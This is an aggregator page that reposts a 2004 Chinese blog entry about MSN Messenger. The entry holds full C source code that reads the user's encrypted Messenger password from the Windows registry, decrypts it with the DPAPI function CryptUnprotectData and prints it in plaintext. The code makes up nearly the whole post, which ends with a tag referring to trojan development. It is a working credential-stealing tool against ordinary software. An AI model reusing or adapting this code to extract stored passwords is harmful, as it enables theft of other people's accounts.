惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
Visual Studio Blog
C
Cisco Blogs
Help Net Security
Help Net Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Scott Helme
Scott Helme
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
M
MIT News - Artificial intelligence
L
LINUX DO - 热门话题
I
InfoQ
GbyAI
GbyAI
NISL@THU
NISL@THU
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Engineering at Meta
Engineering at Meta
H
Hackread – Cybersecurity News, Data Breaches, AI and More
TaoSecurity Blog
TaoSecurity Blog
Simon Willison's Weblog
Simon Willison's Weblog
A
About on SuperTechFans
Spread Privacy
Spread Privacy
月光博客
月光博客
W
WeLiveSecurity
AWS News Blog
AWS News Blog
云风的 BLOG
云风的 BLOG
有赞技术团队
有赞技术团队
Security Latest
Security Latest
人人都是产品经理
人人都是产品经理
PCI Perspectives
PCI Perspectives
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Microsoft Azure Blog
Microsoft Azure Blog
Hugging Face - Blog
Hugging Face - Blog
S
SegmentFault 最新的问题
T
Troy Hunt's Blog
Martin Fowler
Martin Fowler
The Hacker News
The Hacker News
T
Tor Project blog
C
CERT Recently Published Vulnerability Notes
Apple Machine Learning Research
Apple Machine Learning Research
Stack Overflow Blog
Stack Overflow Blog
K
Kaspersky official blog
Cloudbric
Cloudbric
H
Help Net Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
C
Cybersecurity and Infrastructure Security Agency CISA
T
Tailwind CSS Blog
D
DataBreaches.Net
Security Archives - TechRepublic
Security Archives - TechRepublic
T
Tenable Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
博客园 - Franky
L
LINUX DO - 最新话题
MyScale Blog
MyScale Blog

博客园 - Enhydraboy

ADO Connection Strings[转贴] 农民造“飞碟”后记 Tomcat's Thread Pool Source(BT) - Enhydraboy 使用 jakata DBCP package 作 DB Connection pooling[ZT] 数据类型的不匹配可能会导致索引失效 msnlib中的MimeMessage.parse代码需要修改 我的MSN机器人终于有了自己的头像 Field6的类型说明 MSN协议中关于Send DP的研究 搞懂了MSN协议中的client id是怎么得到的 Java正则表达式详解[转载] MSN P2P资料转载 MSN协议中的msnobj浅析 MSNP10中修改自己的FRIENDLY NAME改成了RPR命令 msp10协议中的SYN好像发生了变化 准备让MSN机器人可以显示头像 jMSN开发指南 我自己的msn机器人诞生了 中国足球进步了
[ZT]MSN Messenger的口令获取源代码, MSNMessenger的口令是经过DPAPI加密后保存在注册表中
Enhydraboy · 2004-12-01 · via 博客园 - Enhydraboy

来自http://www.msning.com/bbs/index.php?showtopic=15654

/* MSNMessenger的口令是经过DPAPI加密后保存在注册表中的
* 这个程序演示解码过程
* tombkeeper[0x40]nsfocus[0x2e]com
* tombkeeper[0x40]xfocus[0x2e]net
* 2004.08.11
*/
#include <Windows.h>

#pragma comment(lib, "Advapi32.lib")
#define FCHK(a) if (!(a)) {printf(#a " failed\n"); return 0;}
typedef struct _CRYPTOAPI_BLOB {
DWORD cbData;
BYTE* pbData;
} DATA_BLOB;
typedef struct _CRYPTPROTECT_PROMPTSTRUCT {
DWORD cbSize;
DWORD dwPromptFlags;
HWND hwndApp;
LPCWSTR szPrompt;
} CRYPTPROTECT_PROMPTSTRUCT, *PCRYPTPROTECT_PROMPTSTRUCT;
typedef BOOL (WINAPI *PCryptUnprotectData)(
DATA_BLOB* pDataIn,
LPWSTR* ppszDataDescr,
DATA_BLOB* pOptionalEntropy,
PVOID pvReserved,
CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
DWORD dwFlags,
DATA_BLOB* pDataOut
);
PCryptUnprotectData CryptUnprotectData = NULL;

int main(void)
{
int ret;
HMODULE hNtdll;
HKEY hKey;
DWORD dwType;
char Data[0x100] = {0};
DWORD dwSize;
DATA_BLOB DataIn;
DATA_BLOB DataOut;
ret = RegOpenKeyEx
(
HKEY_CURRENT_USER,
"Software\\Microsoft\\MSNMessenger",
0,
KEY_READ,
&hKey
);
if( ret != ERROR_SUCCESS ) return 1;
ret = RegQueryValueEx
(
hKey,
"Password.NET Messenger Service",
NULL,
&dwType,
Data,
&dwSize
);
if( ret != ERROR_SUCCESS ) return 1;
FCHK ((hNtdll = LoadLibrary ("Crypt32.dll")) != NULL);
FCHK ((CryptUnprotectData = (PCryptUnprotectData)
GetProcAddress (hNtdll, "CryptUnprotectData")) != NULL);
DataIn.pbData = Data + 2; //口令密文从第二位开始
DataIn.cbData = dwSize-2;
CryptUnprotectData
(
&DataIn,
NULL,
NULL,
NULL,
NULL,
1,
&DataOut
);
base64_decode (DataOut.pbData, Data, strlen(DataOut.pbData));
printf ( "MSN Password: %s\n", Data);
return 0;
}
//copied from GNU libc - libc/resolv/base64.c
int base64_decode (char const *src, char *target, size_t targsize)
{
static const char Base64[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static const char Pad64 = ‘=‘;
int tarindex, state, ch;
char *pos;
state = 0;
tarindex = 0;
while ((ch = *src++) != ‘\0‘)
{
if (isspace (ch)) /* Skip whitespace anywhere. */
continue;
if (ch == Pad64)
break;
pos = strchr (Base64, ch);
if (pos == 0) /* A non-base64 character. */
return (-1);
switch (state)
{
case 0:
if (target)
{
if ((size_t) tarindex >= targsize)
return (-1);
target[tarindex] = (pos - Base64) << 2;
}
state = 1;
break;
case 1:
if (target)
{
if ((size_t) tarindex + 1 >= targsize)
return (-1);
target[tarindex] |= (pos - Base64) >> 4;
target[tarindex + 1] = ((pos - Base64) & 0x0f) << 4;
}
tarindex++;
state = 2;
break;
case 2:
if (target)
{
if ((size_t) tarindex + 1 >= targsize)
return (-1);
target[tarindex] |= (pos - Base64) >> 2;
target[tarindex + 1] = ((pos - Base64) & 0x03) << 6;
}
tarindex++;
state = 3;
break;
case 3:
if (target)
{
if ((size_t) tarindex >= targsize)
return (-1);
target[tarindex] |= (pos - Base64);
}
tarindex++;
state = 0;
break;
default:
abort ();
}
}
/*
* We are done decoding Base-64 chars. Let‘s see if we ended
* on a byte boundary, and/or with erroneous trailing characters.
*/
if (ch == Pad64)
{ /* We got a pad char. */
ch = *src++; /* Skip it, get next. */
switch (state)
{
case 0: /* Invalid = in first position */
case 1: /* Invalid = in second position */
return (-1);
case 2: /* Valid, means one byte of info */
/* Skip any number of spaces. */
for ((void) NULL; ch != ‘\0‘; ch = *src++)
if (!isspace (ch))
break;
/* Make sure there is another trailing = sign. */
if (ch != Pad64)
return (-1);
ch = *src++; /* Skip the = */
/* Fall through to "single trailing =" case. */
/* FALLTHROUGH */
case 3: /* Valid, means two bytes of info */
/*
* We know this char is an =. Is there anything but
* whitespace after it?
*/
for ((void) NULL; ch != ‘\0‘; ch = *src++)
if (!isspace (ch))
return (-1);
/*
* Now make sure for cases 2 and 3 that the "extra"
* bits that slopped past the last full byte were
* zeros. If we don‘t check them, they become a
* subliminal channel.
*/
if (target && target[tarindex] != 0)
return (-1);
}
}
else
{
/*
* We ended by seeing the end of the string. Make sure we
* have no partial bytes lying around.
*/
if (state != 0)
return (-1);
}
return (tarindex);
}
//透视木马开发技术